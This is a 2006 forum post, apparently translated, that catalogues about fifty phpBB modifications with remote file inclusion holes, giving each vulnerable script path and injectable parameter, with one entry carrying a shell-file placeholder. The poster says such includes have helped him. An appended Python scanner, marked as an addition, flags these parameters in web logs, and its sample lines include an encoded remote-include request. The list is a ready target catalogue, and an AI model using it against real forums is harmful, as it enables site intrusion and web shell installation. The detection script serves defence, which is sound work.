  #17  
21.11.2006, 23:12
Digimortal

Regarding vulnerabilities in phpBB hacks and modifications: the ones you will come across there most often are of the remote include type, and there are quite a lot of advisories and exploits on this topic. Going by the Bugtraq reports, and having looked through a pile of exploits for phpBB mods on milw0rm in my time, I put together a little file of vulnerable scripts and add to it from time to time:
Code:
TopList Hack for PHPBB <= 1.3.8		/toplist.php?f=toplist_top10&phpbb_root_path=
Advanced GuestBook			/admin/addentry.php?phpbb_root_path=
Knowledge Base Mod			/includes/kb_constants.php?module_root_path=
phpBB auction mod			/auction/auction_common.php?phpbb_root_path=
phpRaid <= 3.0.b3			/[phpraidpath]/auth/auth.php?phpbb_root_path=
					/[phpraidpath]/auth/auth_phpbb/phpbb_root_path=
					/[phpraidpath]/auth/auth.php?smf_root_path=
					/[phpraidpath]/auth/auth_SMF/smf_root_path=
PafileDB				/[pdbpath]/includes/pafiledb_constants.php?module_root_path=
Foing <= 0.7.0				/index.php?phpbb_root_path=
					/song.php?phpbb_root_path=
					/faq.php?phpbb_root_path=
					/list.php?phpbb_root_path=
					/gen_m3u.php?phpbb_root_path=
					/playlist.php?phpbb_root_path=
Activity MOD Plus			/language/lang_english/lang_activity.php?phpbb_root_path=
Blend Portal <= 1.2.0			/blend_data/blend_common.php?phpbb_root_path=
Minerva <= 2.0.8a			/stat_modules/users_age/module.php?phpbb_root_path=
Minerva <= v238				/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=
FlashBB <= 1.1.5			/phpbb/getmsg.php?phpbb_root_path=
HoRCMS <= 1.3.1				/includes/functions_cms.php?phpbb_root_path=
mail2forum <= 1.2			/m2f/m2f_phpbb204.php?m2f_root_path=
					/m2f/m2f_forum.php?m2f_root_path=
					/m2f/m2f_mailinglist.php?m2f_root_path=
					/m2f/m2f_cron.php?m2f_root_path=
WoW Roster				/[roster_path]/lib/phpbb.php?subdir=
Integramod Portal			/includes/functions_mod_user.php?phpbb_root_path=
					/includes/functions.php?phpbb_root_path=
Shadow Premod <= 2.7.1			/includes/functions_portal.php?phpbb_root_path=				
phpBB XS <= 0.58			/includes/functions_kb.php?phpbb_root_path=
					/includes/bbcb_mg.php?phpbb_root_path=
					/includes/functions.php?phpbb_root_path=
pnphpbb					/includes/functions_admin.php?phpbb_root_path=
Admin Topic Action Logging		/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=
phpBB Static Topics <= 1.0		/includes/functions_static_topics.php?phpbb_root_path=
Security Suite IP Logger		/includes/logger_engine.php?phpbb_root_path=
Dimension of phpBB			/includes/themen_portal_mitte.php?phpbb_root_path=
					/includes/logger_engine.php?phpbb_root_path=
					/includes/functions.php?phpbb_root_path=
phpBB User Viewed Posts Tracker		/includes/functions_user_viewed_posts.php?phpbb_root_path=
phpBB RANDOm USER REGISTRATION NUMBER	/includes/functions_num_image.php?phpbb_root_path=
phpBB insert user <= 0.1.2		/includes/functions_mod_user.php?phpbb_root_path=
phpBB Import Tools Mod <= 0.1.4		/includes/functions_mod_user.php?phpbb_root_path=
phpBB Ajax Shoutbox <= 0.0.5		/shoutbox.php?phpbb_root_path=
SpamBlockerMOD <= 1.0.2			/root/includes/antispam.php?phpbb_root_path=
phpBB PlusXL 2.x <= build 272		/mods/iai/includes/constants.php?phpbb_root_path=
AMAZONIA MOD				/zufallscodepart.php?phpbb_root_path=
news defilante horizontale <= 4.1.1	/français/root/includes/functions_newshr.php?phpbb_root_path=
phpBB lat2cyr <= 1.0.1			/lat2cyr.php?phpbb_root_path=
SpamOborona PHPBB Plugin		/admin/admin_spam.php?phpbb_root_path=
RPG Events 1.0.0			/functions_rpg_events.php?phpbb_root_path=
phpBB archive for search engines	/includes/archive/archive_topic.php?phpbb_root_path=
PhpBB Prillian French			/language/lang_french/lang_prillian_faq.php?phpbb_root_path=
phpBB ACP User Registration Mod 1.00	/includes/functions_mod_user.php?phpbb_root_path=
phpBB Security <= 1.0.1			/phpbb_security.php?phpbb_root_path=
phpBBFM version 206-3-3			/language/lang_english/lang_prillian_faq.php?phpbb_root_path=
Fully Modded phpBB 2			/faq.php?foing_root_path=sh3ll.txt?
					/index.php?foing_root_path=
					/list.php?foing_root_path=
					/login.php?foing_root_path=
					/playlist.php?foing_root_path=
					/song.php?foing_root_path=
					/gen_m3u.php?foing_root_path=
					/view_artist.php?foing_root_path=
					/view_song.php?foing_root_path=
					/login.php?foing_root_path=
					/playlist.php?foing_root_path=
					/song.php?foing_root_path=
					/flash/set_na.php?foing_root_path=
					/flash/initialise.php?foing_root_path=
					/flash/get_song.php?foing_root_path=
					/includes/common.php?foing_root_path=
					/admin/nav.php?foing_root_path=
					/admin/main.php?foing_root_path=
					/admin/list_artists.php?foing_root_path=
					/admin/index.php?foing_root_path=
					/admin/genres.php?foing_root_path=
					/admin/edit_artist.php?foing_root_path=
					/admin/edit_album.php?foing_root_path=
					/admin/config.php?foing_root_path=
					/admin/admin_status.php?foing_root_path=
Spider Friendly <= 1.3.10		/admin/modules_data.php?phpbb_root_path=
I don't know, maybe it will come in handy for someone; includes like these have only helped me a couple of times.
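
For defenders, the `*_root_path` parameter names in the list above work as an access-log signature, because those variables are meant to be set by the including script and never by the client. The following is an added example, not part of the original post: the function names are hypothetical, the log lines are constructed, and the common/combined log format is assumed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names copied from the list in the post. The scripts expect these
# to be set by the including file, never by the client.
INCLUDE_PARAMS = {"phpbb_root_path", "module_root_path", "smf_root_path",
                  "m2f_root_path", "foing_root_path"}
# A value that starts with a URL scheme or "//" points the include off-host.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]+:|//)", re.I)
# Common/combined log format: client IP, request line, status code.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def classify(line):
    """Return a finding dict for a request that sets an include-path parameter."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    # parse_qsl percent-decodes, so encoded values are caught too.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        base = name.lower().split("[")[0]          # also catches name[]=...
        if base in INCLUDE_PARAMS:
            kind = "remote-include" if REMOTE.match(value) else "path-override"
            return {"ip": m["ip"], "script": parts.path, "param": base,
                    "kind": kind, "status": int(m["status"])}
    return None

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation IP ranges, placeholder host).
SAMPLE_LOG = [
    '198.51.100.7 - - [21/Nov/2006:23:10:01 +0300] "GET /forum/includes/functions.php'
    '?phpbb_root_path=http%3A%2F%2Fhost.example%2Fx.txt%3F HTTP/1.1" 200 512',
    '198.51.100.7 - - [21/Nov/2006:23:10:05 +0300] "GET /forum/m2f/m2f_cron.php'
    '?m2f_root_path=../../ HTTP/1.1" 404 97',
    '203.0.113.5 - - [21/Nov/2006:23:11:40 +0300] "GET /forum/viewtopic.php'
    '?t=42 HTTP/1.1" 200 18211',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A `remote-include` finding answered with status 200 deserves the first look, since the script ran with a client-supplied include path.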